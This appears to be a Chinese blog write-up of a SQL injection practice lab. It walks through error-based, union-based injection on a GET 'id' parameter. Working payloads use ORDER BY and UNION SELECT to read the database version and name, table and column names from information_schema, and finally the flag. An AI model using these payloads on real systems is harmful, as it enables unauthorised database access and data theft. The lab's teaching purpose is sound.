当前位置: 首页 > news >正文

SQL注入靶场显错注入(一)

 

SQL注入靶场显错注入(一)

1

确定注入点位置

1.1.根据请求方式的不同分为GET和POST

GET型注入

    注入参数通过 URL(查询字符串) 传递,通常是由用户直接在浏览器地址栏输入

格式通常为:http://example.com/page.php?id=1&name=admin

 

POST型注入

    注入参数通过 HTTP请求正文(Body) 传递,通常是通过<form method="POST">提交的表单数据(如登录框、搜索框、评论框)

格式通常为POST提交到/login.php,请求正文为 username=admin&password=123456

1.2.注入点在GET请求的ID参数里

image

2

确定注入类型和字段数

2.1.测试注入字段类型

使用逗号返回空,没引起报错。使用2-1返回正常值说明存在数字型注入。

字符型注入的后端为:

"SELECT * FROM user WHERE id='$_GET[id]'";

因此需要使用单引号闭合语句。而数字型注入后端为:

"SELECT * FROM user WHERE id=$_GET[id]";

直接使用逻辑判断为数字型注入。

2.2.使用ORDER BY判断字段数

使用列索引排序判断字段数,实际后台执行:

image

判断出字段数为3,当输入4时返回-No results found

image

3

确定回显点

3.1.使用union函数判断回显点

image

确认回显点是2和3

image

 

4

获取当前数据库的库名和表名

4.1.获取当前数据库的库名

?id=89 union select 1,version(),database()

image

4.2.获取当前数据库的表名

?id=91 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='error')

image

5

获取列名和Flag

5.1.获取列名

?id=91 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='error_flag' and table_schema='error')

image

5.2.获取Flag

?id=91 union select 1,2,group_concat(flag) from error_flag

image

END

 

http://www.jsqmd.com/news/59745/

相关文章:

  • AI 编程协作,我的一点邪修方法,希望可以帮助到你
  • 2025年终有机肥发酵翻抛机厂家TOP5推荐:有机肥生产设备选型指南
  • 让Windows系统在每次登录时自动联网同步时间
  • Python组合:通过__new__方法实现成员类访问宿主类的方法
  • 2025年有机肥生产设备顶尖厂家权威评测:五大实力企业助力绿色农业升级
  • 2025年12月有机肥生产设备厂家最新推荐:资质与实力双优之选
  • AI元人文:公平的可计算化与维度谱调谐
  • 2025 年支付宝消费券回收平台推荐:支付宝消费券闲置、支付宝消费券快速回收、支付宝消费券用不完回收平台选择指南
  • AI浪潮下的冷思考:技术、赛道与我们的未来
  • 电子汽车衡厂家哪家好?2025电子汽车衡生产企业实力榜
  • 2025年主流重疾险购买指南:青云卫/达尔文12号优选渠道解
  • 【2025最新版】WPS Office下载安装教程完整指南:轻量高效的多平台办公套件
  • 告别MCU+AT:OpenCPU开启嵌入式新纪元(2)
  • 2025年眼镜护理液实力厂家权威推荐榜单: 硬性隐形眼镜护理液‌/隐形眼镜护理液‌/硬镜护理液‌源头厂家精选
  • AI元人文:价值原语化——价值原语的维度谱方法论(理论阐述)
  • 2025年灰色封堵胶泥生产厂家企业权威指南:非凝固型密封硅胶防火泥/高分子有机硅胶封堵泥/有机硅防火泥源头企业精选
  • YOLOv5 RKNN 部署
  • 2025年Q4堆垛机厂家TOP5排行榜:TSG特种设备许可+JB/T7016,快速交付推荐
  • 2025年物联网终端制造企业权威推荐榜单: 物联网公司‌/工业物联网‌/iot物联网‌源头厂家精选
  • 2025采购供应链平台系统TOP5推荐:案例落地与场景适配指南
  • 2025 年 12 月京东 e 卡回收,京东 e 卡回收平台,回收京东 e 卡厂家最新推荐,聚焦资质、案例、售后的十家机构深度解读!
  • 三星浏览器网页创建快捷方式
  • 2025年茶桌茶台制造厂权威推荐榜单:保险柜‌/办公隔断‌/员工桌‌源头制造厂精选
  • 祛斑精华哪个牌子效果好?2025 官方六大优选,权威背书 +用户口碑双验证
  • RV1126 NO.37:OPENCV的图像叠加功能 - 详解
  • json压缩与解压
  • 2025 美国留学机构 TOP10 推荐:精准适配需求,冲刺藤校更有底气
  • 2025年特氟龙喷涂厂家权威推荐榜单:无机纤维喷涂/静电喷涂/不锈钢喷塑加工源头厂家精选
  • 2025最新招投标系统实战推荐TOP5:从全流程数智化到垂直场景适配,企业选型指南
  • 2025年12月出入口安防系统,安防监控系统,弱电安防系统厂家推荐:聚焦安防核心需求,资质认证与案例落地双保障!